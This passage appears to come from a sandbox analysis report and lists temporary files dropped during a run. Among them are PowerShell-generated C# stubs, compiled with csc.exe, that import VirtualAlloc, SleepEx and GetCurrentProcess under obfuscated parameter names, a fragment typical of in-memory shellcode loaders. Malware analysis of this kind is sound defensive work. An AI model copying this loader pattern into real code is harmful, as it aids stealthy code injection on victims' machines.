                            SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                            Malicious:false
                            Reputation:unknown
                            Preview: @...e................................................@..........
                            C:\Users\user\AppData\Local\Temp\RES391B.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                            Category:dropped
                            Size (bytes):1336
                            Entropy (8bit):3.991876287469523
                            Encrypted:false
                            SSDEEP:24:H2Fm9maDAqOaHqhKdNwI+ycuZhNlwakS61PNnq9Sd:BrgKdm1ullwa36vq9C
                            MD5:A924A25BC2BFFD71BC939EE54BBDC7B7
                            SHA1:19DB2BED2D6CE6E28D719DD588403D58201EEBF6
                            SHA-256:FB087178177FE988DD91FCCA1ED2F9F93313FACF5E43039076D2EA101B76E2C8
                            SHA-512:5CBC29FCA7E9B287A6FD143376DA20A140132D0D7BFF644EDBFE7FB0360E8315F7753704005B4BA5F9C0EC5836DD0E608A796E74E40DCDDE5CF77554AF2AE937
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........W....c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP.................8p|..t.).....g...........7.......C:\Users\user\AppData\Local\Temp\RES391B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.t.m.p.m.3.o.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                            C:\Users\user\AppData\Local\Temp\RES4531.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                            Category:dropped
                            Size (bytes):1332
                            Entropy (8bit):3.9787663301438485
                            Encrypted:false
                            SSDEEP:24:HvMzW9n+arP1p11aHxUhhKdNwI+ycuZhN5akSnPNnq92d:Z7rP9oyvKdm1ul5a31q9G
                            MD5:7D8E752877E3D05D6EF7FA19F61D1B1B
                            SHA1:9A737232CA061BFB20872477083A44934CEC3309
                            SHA-256:329690906DBAA3C008A62AB1257C741217071A6C8298E7AC3E1FEC040849102C
                            SHA-512:16620E26157A2FBA00A6494B3F8ECAF5B74F8E2B7D5738B6123FC739E9769F3009C922827B64AB718FD14FDA82B65E69CC8654E2482F48C178A2332F312954C1
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP................0..q.....>.|.s...........7.......C:\Users\user\AppData\Local\Temp\RES4531.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.o.n.0.v.o.s.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                            C:\Users\user\AppData\Local\Temp\RES5221.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                            Category:dropped
                            Size (bytes):1336
                            Entropy (8bit):3.9997994300245385
                            Encrypted:false
                            SSDEEP:24:HkFm9mayzVaHUMhKdNwI+ycuZhNcakSoPNnq9Sd:PyzI0eKdm1ulca3Qq9C
                            MD5:A7D19B016DD2E87C7F1705B8AF710E8E
                            SHA1:E7051DE14C9A314A4080D70224AD09816268BF02
                            SHA-256:016221C08CBD224990582FEE0A8BA0DCA0DF09DDF7FDA02F4599FFA82A2B3952
                            SHA-512:F5EE0E4E2556DC500CEA21597DC7E4C4E4C937543E019FB6F9BE31CC7DB6F6A8149C6C99C4F4C4930F045360D6C4AA185278F26B9EBD796B2F6E55A919F997FB
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........W....c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP...................,py,.......X..........7.......C:\Users\user\AppData\Local\Temp\RES5221.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.u.p.b.k.l.0.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                            C:\Users\user\AppData\Local\Temp\RES5A7E.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                            Category:dropped
                            Size (bytes):1336
                            Entropy (8bit):3.979389767875343
                            Encrypted:false
                            SSDEEP:24:HfFm9na7QVQaHVuPYhKdNwI+ycuZhN05akSPOPNnq9Sd:P7QXFKdm1ulua3Kq9C
                            MD5:BBFDDF46C53F13E3CD50C7FB032A9C11
                            SHA1:7FD005ACB8E69898681243C45BAEE3E9B07E1A60
                            SHA-256:63ED0B7F7A4719A72DA2A424362DBCDDA27BB627AC844AFD13F71080AEE3AE31
                            SHA-512:8BFB18E6C91F2341877E8E28745730E4A191E8AFE83DA8ED175932AD2D92E11664E5F96727CEA54BC8AFAA3B36ED40CE338B2686C60C1FFA778CE804C4CD4964
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........V....c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP...................Z.g9ZU.k}r=o.q..........7.......C:\Users\user\AppData\Local\Temp\RES5A7E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.n.c.z.r.n.m.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2eefwtls.lhg.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qmymils.dhi.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c23bcfov.aow.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_culvhp2o.fyb.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mf2uh0zs.y2u.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pojno3ob.mpp.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0ypotfd.4rq.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeezm4uy.clm.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                            C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.216630389653668
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fMpo/l0zxs7+AEszIN723fMpo//n:p37Lvkmb6K2aWoCWZETaWoH
                            MD5:F2CAB91D6AE2F982B347805414E2DA2F
                            SHA1:9134FFA580A5782320E2BECD2E6D13CA5016FE4A
                            SHA-256:E7A0D624F6DA13B73E6397DAAF131CE3B8A843CBF47975D26A1C7C39B1A79DAA
                            SHA-512:B1A982AD547563FD21A51E442BC4CB6A0A5AF5E8F5EA47B23734BC9657366F5E57A198B7EFBA97AACB2F99A751931E1C5446748D178D8DB564F3AEB416ED51B0
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.0.cs"
                            C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):872
                            Entropy (8bit):5.3041980760639875
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2aWozETaWoOKaM5DqBVKVrdFAMBJTH:Akka6CfE+yKxDcVKdBJj
                            MD5:28601DA1A34FA522B7E501CAB2D52D0D
                            SHA1:CE63B8E4F3DACA2C049859BCCFEFE922312E953B
                            SHA-256:71785F6CACBEA8608EE82CBEF53670305A597D826F6AA6A2BACB13A722378992
                            SHA-512:605216610FF268226BED924AE1F648B5733C2D119757CF6FBEB9BD67371D98F5C19C5D34E3CA09E4B4781B97FBE7E6BADF56AB44601B7AC0BC1A472B50881A52
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\gmpgobli\CSCF109427183474975B6FB7C2A3C78B8D5.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.074713113011581
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRrak7Ynqq4EPN5Dlq5J:+RI+ycuZhNvakSBPNnqX
                            MD5:DB7C686DED61FAF08452A0F834AFA8DA
                            SHA1:58D7DDDA0A4A2DA91E31C497B111902DAC894F1B
                            SHA-256:BEB640592987F9EABFCF681FBA55C2A2A39D87D033E90359DE62F37DEBED2A09
                            SHA-512:85B17CC2EB71A6DD7065610726B61666C2A5C075851DE4B39CF2DD85EBBBCE6266BC65452C02AE27FD48C6DAEE72C9F45AA09557EB8B98587E04A821DFD0CE8E
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.m.p.g.o.b.l.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.m.p.g.o.b.l.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.158352377882466
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fMnzxs7+AEszIN723fM2GAn:p37Lvkmb6K2a0nWZETa02GAn
                            MD5:572BA0D098BD81AE02A0A8D1820CC54E
                            SHA1:8CD2D32442EE473F6ABFA6ED6879958BE9F0B644
                            SHA-256:F93B490D9A53DBF4B286DB3F90D7F1831712992DA4F55AB58A25100DFF70B2BA
                            SHA-512:2CAC5D0802040E9224834909AEDAF66ABA49A3A0BAF622775FE7478829D86D394724E69C8F529B4BBBD864DA85C3ABAD7424A2304149458487EBAF753BEDC23B
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.0.cs"
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.596786045578255
                            Encrypted:false
                            SSDEEP:24:etGSh/W2dg85xyFODuhxpdWXoWtkZf/KK1UKJ+WI+ycuZhNvakSBPNnq:6Mkb5xykIHWEJCMUKl1ulva3zq
                            MD5:741ADACFC6720E0AF6140AF8DCC349FC
                            SHA1:6EF662F94911E4B24D4B451C27B92536B8F70A95
                            SHA-256:6C26CE931BB1E5E14A72E8EEE8EF3C311B1E4591AB5431716B538AADE4DB8775
                            SHA-512:498BFAAF7842A7FD86C0C4B53F8EF17EBC3FDE3E2E5652958FFF540405145F2B29206A66422873D3F17528960F953D931366FBE3D63C7A5BEAA217298F0E6ABF
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....r.....w...............]. ...]...!.].%...].......*.....3.......6.......H.......P...........
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.287567169766519
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2a/ETao1KaM5DqBVKVrdFAMBJTH:Akka6C/E+o1KxDcVKdBJj
                            MD5:8BCCA5B89F2FA310526D310DF8DBCC42
                            SHA1:FE8909B3FCC426455447E45861D10CC5D5B108FD
                            SHA-256:1FD4EB9B6D19F65B0ACAAF11A7D722C50CD3D12840694A0673FA3CEA0B03B32D
                            SHA-512:C4368FBF67BB826E5B0DC8C1E5E5AC4171157410A405DCB2C12A989F6DCC20084BB2F827EE9D64F92694A4C907F1A7E1F3EC4E40075883B2C6D00270BBB8CA89
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                            C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.266859690195427
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fVCTjC7JUzxs7+AEszIN723fVCTjC3:p37Lvkmb6K2aL+WZETan
                            MD5:4C7D143E2EC6E0CA2EE0893AF138CD54
                            SHA1:A68CAEF8C25979706DE7913E48AD6587288C035A
                            SHA-256:94B89A0A848DFF70B8DF7A7D095D81C2DFF9CF65E156246958F1124DB66A4353
                            SHA-512:1F303FE5AF50CD7ECBB9741F1FB8185F44DA0719CD6714BA0E8DDD429205128A69E1E72E8C2B5A6CE235B0C950222F7FA7B38855CC464DF887129AB633C94905
                            Malicious:false
                            Reputation:unknown
